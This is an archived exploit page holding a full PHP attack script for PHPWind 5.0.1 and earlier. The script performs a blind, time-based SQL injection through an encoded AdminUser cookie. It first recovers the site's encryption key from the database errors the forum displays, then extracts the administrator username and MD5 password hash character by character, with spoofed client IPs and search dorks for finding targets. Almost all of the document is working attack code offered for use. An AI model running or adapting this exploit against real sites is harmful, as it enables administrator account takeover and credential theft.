Home / exploitsPDF  

phpwind-501.txt

Posted on 14 November 2006

<?php print_r(' --------------------------------------------------------------------------- PHPWind <= 5.0.1 "AdminUser" blind SQL injection exploit by rgod retrog@alice.it site: http://retrogod.altervista.org dorks: "powered by phpwind" "powered by phpwind v5.0.1" -site:phpwind.net --------------------------------------------------------------------------- '); if ($argc<3) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to phpwind Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy -t[n]: adjust query timeout (default: 10) -b[n]: adjust the delay for benchmark() -e[key]: specify an encryption key, if you have it it is an md5 fragment (18 chars) Example: php '.$argv[0].' localhost /phpwind/ -P1.1.1.1:80 php '.$argv[0].' localhost / -p81 php '.$argv[0].' localhost /forum/ -t15 -b20000000 php '.$argv[0].' localhost / -t15 -b20000000 php '.$argv[0].' localhost / -t15 -e298af45091ebcdfbcd --------------------------------------------------------------------------- '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.=" "; $exa.=" ";} } return $exa." ".$result; } $proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { return; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy... "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $port=80; $timeout=10; $proxy=""; $b=200000000; $e=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-t") { $timeout=(int) str_replace("-t","",$argv[$i]); } if ($temp=="-b") { $b=(int) str_replace("-b","",$argv[$i]); } if ($temp=="-e") { $e=str_replace("-e","",$argv[$i]); if (!is_my_key($e)){ die("not a valid key..."); } else { $GLOBALS['my_fragment']=$e; } } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "please wait... "; function StrCode($string,$action='ENCODE'){ $key = $GLOBALS['my_fragment']; $string = $action == 'ENCODE' ? $string : base64_decode($string); $len = 18; $code = ''; for($i=0; $i<strlen($string); $i++){ $k = $i % $len; $code .= $string[$i] ^ $key[$k]; } $code = $action == 'DECODE' ? $code : base64_encode($code); return $code; } function random($length) { $hash = ''; $chars = '0123456789abcdef'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1000000); for($i = 0; $i < $length; $i++) { $hash .= $chars[mt_rand(0, $max)]; } return $hash; } function is_my_key($fragment) { if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;} else {return false;} } //need cookie prefix... $packet ="GET ".$p."index.php HTTP/1.0 "; $packet.="CLIENT-IP: 999.999.999.999 ";//spoof $packet.="Host: ".$host." "; $packet.="Accept: text/plain "; $packet.="Connection: Close "; sendpacketii($packet); $temp=explode("lastfid=",$html); $temp2=explode("Set-Cookie: ",$temp[0]); $cp=$temp2[1]; echo "cookie prefix -> ".$cp." "; if (!$e) { //see sql errors... you need a valid key for strcodeii() function, //so let's ask :) $tt=" ";for ($i=1; $i<=255; $i++){$tt.=chr($i);} while (1) { $GLOBALS['my_fragment']=random(18); $au=StrCode($tt,"ENCODE"); $packet ="GET ".$p."admin.php HTTP/1.0 "; $packet.="CLIENT-IP: 999.999.999.999 ";//spoof $packet.="Host: ".$host." "; $packet.="Cookie: ".$cp."AdminUser=".$au."; "; $packet.="Accept: text/plain "; $packet.="Connection: Close "; sendpacketii($packet); $html=html_entity_decode($html); $html=str_replace("<br />","",$html); if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){ $temp=explode("WHERE username='",$html); $temp2=explode("'<br>",$temp[1]); $decoded=$temp2[0]; if (strlen($decoded)==255) break; } } $decoded=" ".$decoded; $temp = $au; //calculating key... $key=""; for ($j=0; $j<18; $j++){ for ($i=0; $i<255; $i++){ $aa=""; if ($j<>0){ for ($k=1; $k<=$j; $k++){ $aa.="a"; } } $GLOBALS['my_fragment']=$aa.chr($i); $t = StrCode($temp,"DECODE"); if ($t[$j]==$decoded[$j]){ $key.=chr($i); } } } if (is_my_key($key)){ echo "encryption key ->".$key." "; $GLOBALS['my_fragment']=$key; } else {die("unable to retrieve the magic key...");} } $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { //you can use every char because of base64_decode()...so this bypass magic quotes... $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),benchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*"; echo "sql -> ".$sql." "; $packet ="GET ".$p."admin.php HTTP/1.0 "; $packet.="CLIENT-IP: 1.2.3.4 "; $packet.="Host: ".$host." "; $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999 ".$sql,"ENCODE")."; "; $packet.="Accept: text/plain "; $packet.="Connection: Close "; $packet.=$data; sendpacketii($packet); usleep(2000000); $starttime=time(); echo "starttime -> ".$starttime." "; sendpacketii($packet); if (eregi("You Can Get Help In",$html)) { die($html." "."debug: you have to modify sql code injected, it seems a different version..."); } $endtime=time(); echo "endtime -> ".$endtime." "; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime." "; if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???] ";sleep(2);break;} } if ($i==255) { die(" Exploit failed..."); } } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),benchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*"; echo "sql -> ".$sql." "; $packet ="GET ".$p."admin.php HTTP/1.0 "; $packet.="CLIENT-IP: 1.2.3.4 "; $packet.="Host: ".$host." "; $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999 ".$sql,"ENCODE")."; "; $packet.="Accept: text/plain "; $packet.="Connection: Close "; $packet.=$data; sendpacketii($packet); usleep(2000000); $starttime=time(); echo "starttime -> ".$starttime." "; sendpacketii($packet); $endtime=time(); echo "endtime -> ".$endtime." "; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime." "; if ($difftime > $timeout) {$admin.=chr($i);echo "admin -> ".$admin."[???] ";sleep(2);break;} if ($i==255) { die(" Exploit failed..."); } } $j++; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) { print_r(' -------------------------------------------------------------------------- admin user -> '.$admin.' pwd hash (md5) -> '.$password.' -------------------------------------------------------------------------- '); } else { echo "exploit failed..."; } ?>

 

TOP